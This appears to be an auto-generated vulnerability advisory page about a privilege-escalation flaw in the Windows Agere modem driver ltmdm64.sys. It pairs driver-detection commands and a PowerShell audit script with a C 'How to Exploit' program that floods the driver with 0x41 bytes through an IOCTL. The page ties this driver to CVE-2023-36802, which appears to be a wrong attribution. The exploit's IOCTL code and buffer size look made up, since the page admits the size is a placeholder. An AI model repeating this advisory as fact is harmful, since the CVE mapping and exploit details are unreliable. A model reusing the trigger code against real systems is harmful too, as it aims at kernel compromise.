Windows Agere Modem Driver, Privilege Escalation, CVE-2023-36802 (High)

The CVE-2023-36802 vulnerability resides in the ltmdm64.sys driver, a legacy Agere Systems modem driver shipped with Windows. This flaw is a local privilege escalation (LPE) vulnerability. A low-privileged attacker with existing local access to the system can exploit a weakness in the driver’s input/output control (IOCTL) request handling mechanism. By sending a specially crafted, malicious IOCTL request to the driver, the attacker can trigger a memory corruption condition, such as a buffer overflow or use-after-free. This corruption allows the attacker to execute arbitrary code in the context of the kernel, the highest privilege level on the operating system. Consequently, the attacker can elevate their privileges from a standard user to SYSTEM or kernel-level authority, enabling them to install programs, view, change, or delete data, and create new accounts with full user rights.
Platform: Windows
Version: Multiple Versions
Vulnerability: Privilege Escalation
Severity: High

date: 10-10-2023

Prediction: 10-10-2023

What Undercode Says:

sc query ltmdm64
powershell "Get-WindowsDriver -Online -All | Where-Object { $_.Driver -like '*ltmdm*' -or $_.OriginalFileName -like '*ltmdm*' }"
Get-CimInstance Win32_PnPSignedDriver | Where-Object { $_.DriverName -like '*ltmdm*' -or $_.InfName -like '*ltmdm*' }

How to Exploit:

#include <windows.h>
#include <stdio.h>
#include <string.h>

/* The buffer size was lost in the page's formatting ("[bash]"); 1024 is a placeholder. */
#define BUF_SIZE 1024

int main(void) {
    /* Open the driver's device object; the device path must be escaped in C source. */
    HANDLE hDevice = CreateFileA("\\\\.\\ltmdm64", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) { return 1; }
    DWORD bytesReturned = 0;
    char inBuffer[BUF_SIZE] = {0};
    char outBuffer[BUF_SIZE] = {0};
    // Malicious buffer crafting
    memset(inBuffer, 0x41, sizeof(inBuffer));
    // Triggering the vulnerable IOCTL
    DeviceIoControl(hDevice, 0x9F00B, (LPVOID)inBuffer, sizeof(inBuffer), (LPVOID)outBuffer, sizeof(outBuffer), &bytesReturned, NULL);
    CloseHandle(hDevice);
    return 0;
}

Protection from this CVE:

Apply October 2023 Patch.

Remove ltmdm64.sys driver.

Disable vulnerable driver.

Block driver load.

Use Windows Defender.
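The checks under "What Undercode Says" and the "Disable vulnerable driver" step above can be combined into one audit script. This is an added example, not code from the original post or from Microsoft; it assumes the service name is ltmdm64 (as in the sc query above) and that the binary lives under System32\drivers, which should be confirmed against your own driver inventory.

```powershell
# Added example: audit ltmdm64.sys on this host and optionally disable its service.
# Assumptions: service name "ltmdm64" and the file path below (not verified by the page).
function Test-Ltmdm64Driver {
    [CmdletBinding()]
    param([switch]$Disable)

    $path = Join-Path $env:SystemRoot 'System32\drivers\ltmdm64.sys'
    # Win32_SystemDriver covers kernel drivers; no match simply returns nothing.
    $svc = Get-CimInstance Win32_SystemDriver -Filter "Name='ltmdm64'"

    $result = [pscustomobject]@{
        FilePresent  = Test-Path $path
        FileVersion  = if (Test-Path $path) { (Get-Item $path).VersionInfo.FileVersion } else { $null }
        ServiceFound = [bool]$svc
        State        = $svc.State       # 'Running' or 'Stopped'
        StartMode    = $svc.StartMode   # 'Boot', 'System', 'Auto', 'Manual' or 'Disabled'
    }

    if ($Disable -and $svc -and $svc.StartMode -ne 'Disabled') {
        # sc.exe is the reliable way to change a kernel driver's start type;
        # the space after 'start=' is required by sc.exe's syntax.
        & sc.exe config ltmdm64 start= disabled | Out-Null
        $result.StartMode = (Get-CimInstance Win32_SystemDriver -Filter "Name='ltmdm64'").StartMode
    }
    $result
}

# Report only; run with -Disable from an elevated prompt to apply the mitigation.
Test-Ltmdm64Driver | Format-List
```

A modem driver is normally loaded on demand, so "Stopped" with StartMode "Manual" still means the driver can be started later; "Disabled" (or removal, then the October 2023 patch) is the state to confirm.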

Impact:

Full System Compromise.

Kernel Mode Access.

Bypass Security Controls.

Persistence Establishment.

Data Theft.

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode
